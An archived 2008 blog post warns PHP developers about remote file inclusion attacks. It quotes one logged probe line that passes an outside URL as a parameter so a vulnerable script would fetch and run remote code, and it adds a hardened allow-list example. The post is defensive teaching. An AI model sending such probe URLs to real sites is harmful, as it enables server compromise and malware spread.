Injection Attacks - avoiding them in your PHP

"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous.

I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitably an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away):

/phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt?

Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's require, include, passthru, exec, system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via $_REQUEST and friends.
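
An added example, not code from this post or from the script named in the log line above: a constructed include driven by a request parameter, kept as a comment, beside an allow-list version in which the request can only pick a key. The `theme` parameter, the `CLASS_DIRS` map, the `classes/` paths, the `htmlclass.php` file name and `resolve_class_dir()` are assumptions made for illustration.

```php
<?php
// Added example: constructed illustration, not code from the original page.

// Risky pattern (left as a comment so this file is safe to run):
//   include $_REQUEST['htmlclass_path'] . '/htmlclass.php';
// The include target is whatever the visitor sent. Appending a fixed suffix
// is no defence: a value ending in "?" turns the suffix into a query string.
// Keeping allow_url_include = Off in php.ini (the default since PHP 5.2)
// blocks remote URLs here, but local paths would still be attacker-chosen.

// Hardened pattern: the request only selects a key; every path that can be
// included is written down on the server in a fixed allow-list.
const CLASS_DIRS = [
    'default' => __DIR__ . '/classes/default',
    'print'   => __DIR__ . '/classes/print',
];

function resolve_class_dir(array $request): string
{
    $key = $request['theme'] ?? 'default';
    if (!is_string($key) || !array_key_exists($key, CLASS_DIRS)) {
        // Record the rejected value (truncated) for later review, then fall back.
        error_log('rejected include selector: ' . substr(json_encode($key), 0, 200));
        $key = 'default';
    }
    return CLASS_DIRS[$key];
}

// Constructed sample requests, including the shape of the probe quoted above.
$samples = [
    ['theme' => 'print'],
    ['theme' => 'http://example.invalid/payload.txt?'],
    ['theme' => ['nested' => 'array']],
    [],
];
foreach ($samples as $request) {
    echo json_encode($request), ' => ', resolve_class_dir($request), PHP_EOL;
}

// In the real script the call would be:
//   require resolve_class_dir($_GET) . '/htmlclass.php';
```

Only the first sample resolves to the `print` directory; the URL, the array and the empty request all fall back to `default`, and the first two are logged as rejected.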

What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ...

How many hack attempts like this are we getting? I estimate it's now thousands per day.

How do I know if I'm infected? Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ...

Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete or definitive list in any shape or form!
(written 2008-08-31 23:54:42)

 


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.


© WELL HOUSE CONSULTANTS LTD., 2008: Well House Manor • 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 0800 043 8225 or 01225 708225 • FAX: 0845 8382 405 or 01225 707126 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho